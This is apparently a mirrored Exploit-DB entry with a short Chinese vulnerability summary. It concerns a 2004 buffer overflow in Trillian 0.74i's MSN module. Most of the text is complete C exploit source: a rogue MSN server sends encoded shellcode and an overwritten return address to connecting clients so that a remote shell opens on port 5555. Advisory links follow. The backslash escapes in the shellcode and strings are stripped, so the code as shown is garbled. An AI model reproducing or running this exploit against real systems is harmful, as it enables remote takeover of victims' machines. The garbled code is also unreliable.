https://www.exploit-db.com/exploits/435
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-135

Trillian0.74i的MSN模块存在缓冲区溢出漏洞。远程MSN服务器可以借助以新行字符结尾的超长字符串执行任意代码。

/*
	Cerulean Studios Trillian 0.74i Buffer Overflow in MSN module exploit
	created by Komrade  -  unsecure altervista org

	Written for Windows 2000 / Windows XP.
	Tested on Windows XP Professional sp0.

	This exploit spawn a shell on port 5555, you have just to execute the
	program	and connect to port 5555.
*/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <string.h>

int main(int argc,char **argv){

	char shellcode[] =
	"xEBx10x5Ax4Ax33xC9x66xB9x66x01x80x34x0Ax99xE2xFAxEB"
	"x05xE8xEBxFFxFFxFFx70x99x98x99x99xC3xFDx12xD8xA9x12"
	"xD9x95x12xE9x85x34x12xD9x91x12x41x12xEAxA5x9Ax6Ax12"
	"xEFxE1x9Ax6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8"
	"x12xA6x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5E"
	"x9DxDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A"
	"x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58x12"
	"x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0x71xE5"
	"x99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12x41xF3x9DxC0"
	"x71xF0x99x99x99xC9xC9xC9xC9xF3x98xF3x9Bx66xCEx69x12"
	"x41x5Ex9Ex9Bx99x8Cx2AxAAx59x10xDEx9DxF3x89xCExCAx66"
	"xCEx6DxF3x98xCAx66xCEx61xC9xC9xCAx66xCEx65x1Ax75xDD"
	"x12x6DxAAx42xF3x89xC0x10x85x17x7Bx62x10xDFxA1x10xDF"
	"xA5x10xDFxD9x5ExDFxB5x98x98x99x99x14xDEx89xC9xCFxCA"
	"xCAxCAxF3x98xCAxCAx5ExDExA5xFAxF4xFDx99x14xDExA5xC9"
	"xCAx66xCEx7DxC9x66xCEx71xAAx59x35x1Cx59xECx60xC8xCB"
	"xCFxCAx66x4BxC3xC0x32x7Bx77xAAx59x5Ax71x62x67x66x66"
	"xDExFCxEDxC9xEBxF6xFAxD8xFDxFDxEBxFCxEAxEAx99xDAxEB"
	"xFCxF8xEDxFCxC9xEBxF6xFAxFCxEAxEAxD8x99xDCxE1xF0xED"
	"xC9xEBxF6xFAxFCxEAxEAx99xD5xF6xF8xFDxD5xF0xFBxEBxF8"
	"xEBxE0xD8x99xEExEAxABxC6xAAxABx99xCExCAxD8xCAxF6xFA"
	"xF2xFCxEDxD8x99xFBxF0xF7xFDx99xF5xF0xEAxEDxFCxF7x99"
	"xF8xFAxFAxFCxE9xEDx99";


	SOCKET sock, client;
	struct sockaddr_in sock_addr, client_addr;
	WSADATA data;
	WORD p;
	char mess[4096];
	int lun, n, i;

	p = MAKEWORD(2, 0);
	WSAStartup(p, &data);

	printf("------------------------------------------------------------------------rn");
	printf("-  Cerulean Studios Trillian 0.74i MSN module Buffer Overflow exploit  -rn");
	printf("-                   for Windows 2000 / Windows XP                      -rn");
	printf("-                                                                      -rn");
	printf("-         created by Komrade  -  http://unsecure.altervista.org        -rn");
	printf("------------------------------------------------------------------------rn");

	sock = socket(PF_INET,SOCK_STREAM, 0);
	sock_addr.sin_family = PF_INET;
	sock_addr.sin_port = htons(1863);
	sock_addr.sin_addr.s_addr = INADDR_ANY;

	bind(sock, (struct sockaddr*)&sock_addr, sizeof(struct sockaddr_in));
	listen(sock,1);

	lun = sizeof (struct sockaddr);

	printf("rnWaiting for a connection...rn");

	client = accept(sock, (struct sockaddr*)&client_addr, &lun);
	if (client <= 0){
		printf("Unable to wait for connectionsrn");
		exit(-1);
	}

	n=recv(client, mess, sizeof(mess),0);
	if (n < 0){
		printf("Error receving connectionsrn");
		exit(-1);
	}

	printf("Received a connection request from a client.rn");

	strcpy(mess, shellcode);

	for(i=strlen(shellcode); i < 4090; i++)
		mess[i]='x';

	mess[i]=0x33;	/**/
	mess[i+1]=0x12;	/*return address of a "call ebx" command in trillian.exe*/
	mess[i+2]=0x40;	/**/
	mess[i+3]='r';
	mess[i+4]='n';
	mess[i+5]='';

	n = send(client, mess, strlen(mess),0);
	if (n > 0){
		printf("Exploit sent succesfully.rn");
		printf("Now connect to port 5555.rn");
	}
	else
		printf("Error sending the exploitrn");

	closesocket (client);
	closesocket(sock);
	WSACleanup();
	return 0;
}

// milw0rm.com [2004-09-08]

来源:XF
名称:trillian-msn-bo(17292)
链接:http://xforce.iss.net/xforce/xfdb/17292
来源:BID
名称:11142
链接:http://www.securityfocus.com/bid/11142
来源:unsecure.altervista.org
链接:http://unsecure.altervista.org/security/trillian.htm
来源:SECUNIA
名称:12487
链接:http://secunia.com/advisories/12487
来源:BUGTRAQ
名称:20040908CeruleanStudiosTrillian0.74iBufferOverflowinMSNmoduleexploit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109466618609375&w;=2